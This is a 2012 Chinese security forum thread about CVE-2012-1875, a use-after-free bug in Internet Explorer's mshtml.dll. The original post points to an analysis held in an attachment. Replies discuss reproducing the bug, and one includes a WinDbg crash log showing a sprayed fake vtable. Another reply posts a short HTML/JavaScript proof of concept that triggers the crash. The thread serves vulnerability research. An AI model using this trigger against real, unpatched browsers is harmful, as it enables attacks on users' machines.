首页
论坛
专栏
课程

[原创]CVE-2012-1875:mshtml.dll Use-After-Free漏洞分析

cscoder
5
2012-6-17 23:13 6584
挖洞这种同时考验内功和人品的事儿,对我来说还是太强人所难,所以我只能捡点纯体力劳动干干,趁自己还年轻,有膀子力气
调试了一番外国友人提供的POC,写了一点自己的理解和大家分享。文中纰漏之处,恳请各位看官斧正

[推荐]十年磨一剑!《加密与解密(第4版)》上市发行

上传的附件:
最新回复 (19)
金罡 1 2012-6-18 11:03
2

0

膜拜楼主的调试功底。
miaoling 2012-6-18 12:03
3

0

mark,先顶后看
riusksk 41 2012-6-18 13:42
4

0

不错,下载学习下
俊虎 2012-6-18 15:45
5

0

看看先,厉害的人还是蛮多的
打狗棒 2012-6-18 16:31
6

0

看作者的调试文档很给力,但是我重现场景不能触发呢?
用文档中修改后的POC,貌似IE没加载mshtml模块啊??
yiyiguxing 1 2012-6-19 11:25
7

0

K.K的功力越来越深
bitt 5 2012-6-20 14:26
8

0

下载学习 谢谢分享
riusksk 41 2012-6-20 23:38
9

0

KK熟悉IE解析html的过程啊,求学习资料,各种函数调用这些,或者api文档,求科普
baixinye 1 2012-6-23 13:39
10

0

IE 5 源码 + 符号 + IDA NAME搜索html各种关键字 + 各种推测
hmonster 2012-6-23 18:57
11

0

学习了,支持楼主
riusksk 41 2012-6-23 19:07
12

0

thx................
黑恋 2012-6-25 15:34
13

0

感谢楼主分享。什么好东东啊?
天易love 18 2012-6-25 15:40
14

0

100台电脑有几台能测试成功啊?这个版本的dll还能找到吗?抽象贴
bitt 5 2012-6-25 19:43
15

0

不会吧
ie8很稳定重现啊
风水也很好 命中稳定
访问异常就是伪造的 vtable 1c1c1c7c
 (720.c68): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=1c1c1c0c ebx=00000000 ecx=00321668 edx=00000001 esi=00321668 edi=0208b7c0
eip=68dbc402 esp=0208b758 ebp=0208b764 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
mshtml!CElement::Doc+0x2:
68dbc402 8b5070          mov     edx,dword ptr [eax+70h] ds:0023:1c1c1c7c=????????
0:005> uf mshtml!CElement::Doc
mshtml!CElement::Doc:
68dbc400 8b01            mov     eax,dword ptr [ecx]
68dbc402 8b5070          mov     edx,dword ptr [eax+70h]
68dbc405 ffd2            call    edx
68dbc407 8b400c          mov     eax,dword ptr [eax+0Ch]
68dbc40a c3              ret
bitt 5 2012-6-25 19:48
16

0

发个简化版 crash poc
<DIV id=testfaild>
	<img id="imgTest">
	<div id="imgTest"></div>
	<input id="4B5F5F4B" onMouseOver="crash();"></input>
</DIV>

<script language="JavaScript">
function crash() {
	eval("imgTest").src = "";
}

function trigger() {
	var x =document.getElementsByTagName("input");
	x[0].fireEvent("onMouseOver");
	testfaild.innerHTML = testfaild.innerHTML;
	x[0].fireEvent("onMouseOver");
}
trigger();
</script>
天易love 18 2012-6-25 20:25
17

0

请问楼上兄弟你的漏洞模块: mshtml.dll 8.0.6001.19222是在哪里找到的?谢谢
我的IE8:
上传的附件:
bitt 5 2012-6-25 21:42
18

0

[QUOTE=天易love;1082710]请问楼上兄弟你的漏洞模块: mshtml.dll 8.0.6001.19222是在哪里找到的?谢谢
我的IE8:
[/QUOTE]

你的ie版本和楼主的倒是一样
我的ie是for win7的所以版本号是8.0.7600.16385

按说这是个新漏洞 只要近期没升级的低一点的版本 应该都很难幸免
可以windbg附加 跑 看看有没有什么异常
AntBean 9 2012-6-26 16:55
19

0

我的ie 8 + window xp sp3 en 没重现出来,头大。。。
善良屠夫 2012-7-1 13:23
20

0

先顶一个 再学习
返回